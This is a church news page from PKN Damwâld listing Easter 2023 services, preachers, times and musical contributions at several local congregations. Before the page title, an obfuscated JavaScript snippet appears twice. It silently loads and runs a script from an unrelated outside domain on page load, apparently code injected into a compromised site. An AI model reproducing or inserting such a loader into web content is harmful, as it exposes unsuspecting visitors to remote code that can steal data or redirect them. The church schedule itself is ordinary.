;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdiensten rond Pasen en de Interkerkelijke Paasviering Campus Damwâld - PKN Damwâld

Kerkdiensten rond Pasen en de Interkerkelijke Paasviering Campus Damwâld

Gepubliceerd op: dinsdag 4 april 2023

Wij heten u deze pasen graag welkom in één van onze kerkdiensten:✨

𝐆𝐞𝐳𝐚𝐦𝐞𝐧𝐥𝐢𝐣𝐤𝐞 𝐩𝐚𝐚𝐬𝐝𝐢𝐞𝐧𝐬𝐭
𝕋𝕨𝕖𝕖𝕕𝕖 𝕡𝕒𝕒𝕤𝕕𝕒𝕘 𝕠𝕞 𝟘𝟡.𝟛𝟘 𝕦𝕦𝕣 𝕤𝕡𝕠𝕣𝕥𝕙𝕒𝕝, 𝔹𝕒𝕕𝕙𝕦́𝕤𝕨𝕖𝕚 𝟛𝟙 𝕥𝕖 𝔻𝕒𝕞𝕨𝕒̂𝕝𝕕
De viering staat onder leiding van ds. G.J. Otter en muzikale medewerking zal worden verleend door:
🎶 Brassband “Ere zij God”, o.l.v. Jochem Hoekstra
🎶 Gospelband The Freedomsingers uit Engwierum o.l.v. Ben Brunt
Er is oppas voor de kinderen. Iedereen is van harte welkom!
𝐆𝐞𝐫𝐞𝐟. 𝐤𝐞𝐫𝐤 𝐁𝐫𝐨𝐞𝐤𝐬𝐭𝐞𝐫𝐰â𝐥𝐝 – 𝐃𝐞 𝐅𝐚𝐥𝐨𝐦
Ds. Feitsmaweg 1 te Broeksterwâld
2 apr 09.30 uur Palmzondag, Voorbereiding Heilig Avondmaal, ds. B. Haanstra Dokkum
6 apr 19.30 uur Witte donderdag, ds. E.J. Terpstra Bunschoten, Heilig Avondmaal
7 apr 19.30 uur Goede vrijdag, mw. Johanna Bloem Broeksterwâld
9 apr 09.30 uur Eerste Paasdag, ds. A. Bouman Leeuwarden
𝐆𝐞𝐫𝐞𝐟. 𝐊𝐞𝐫𝐤 𝐃𝐚𝐦𝐰â𝐥𝐝 & 𝐇𝐞𝐫𝐯𝐨𝐫𝐦𝐝 𝐀𝐤𝐤𝐞𝐫𝐰𝐨𝐮𝐝𝐞 𝐌𝐮𝐫𝐦𝐞𝐫𝐰𝐨𝐮𝐝𝐞 – 𝐁𝐫𝐨𝐞𝐤𝐬𝐭𝐞𝐫𝐰𝐨𝐮𝐝𝐞 – 𝐃𝐞 𝐕𝐚𝐥𝐨𝐦
De Ontmoeting, Foarwei 48 te Damwâld
6 apr 19.30 uur Witte donderdag, ds. S. Boukes viering Heilig Avondmaal
7 apr 16.00 uur Goede vrijdag, Nij Tjaerda, ds. G.J. Otter. Viering Heilig Avondmaal voor bewoners en omwonenden van Nij Tjaerda
7 apr 19.30 uur Goede vrijdag, ds. G.J. Otter, met muzikale medewerking van Margrietha Zagema en Hildegard Otter
9 apr 09.30 uur Eerste Paasdag, Robert Colijn, gezinsdienst in samenwerking met
Blits! (kindernevendienst). Muzikale medewerking van gospelband SIGN, organist Foeke Wiegersma en trompettist Eddy Huizenga.
𝐁𝐞𝐧𝐞𝐝𝐢𝐜𝐭𝐮𝐬𝐤𝐞𝐫𝐤, 𝐇𝐞𝐫𝐯𝐨𝐫𝐦𝐝 𝐃𝐚𝐧𝐭𝐮𝐦𝐚𝐰𝐨𝐮𝐝𝐞
Doniawei 76 te Damwâld
6 apr 19.30 uur Witte donderdag, ds. J. Miedema Viering Heilig Avondmaal
7 apr 19.30 uur Goede vrijdag, Liturgie commissie
8 apr 19.30 uur Stille zaterdagm Liturgie commissie
9 apr 09.30 uur Eerste Paasdag, ds. J. Miedema
𝐌𝐞𝐧𝐢𝐬𝐭𝐞 𝐆𝐞𝐦𝐞𝐞𝐧𝐭𝐞
Doniawei 34 te Damwâld
2 apr 09.00 uur Palmpasenontbijt, ds. Roelof Akse
6 apr 19.30 uur Avondmaalsviering, zr. Aeltsje de Groot
7 apr 19.30 uur Goede vrijdagviering, ds. Roelof Akse met medewerking van Gabriël Anthonio en zijn vriend Hans, die elkaar kennen van de TBS- kliniek in Groningen
9 apr 09.30 uur Eerste Paasdagviering m.m.v. jonge muzikanten van ‘Ere Zij God’
met een extra collecte voor World Servants

Namens de Interkerkelijke Evangelisatie Commissie.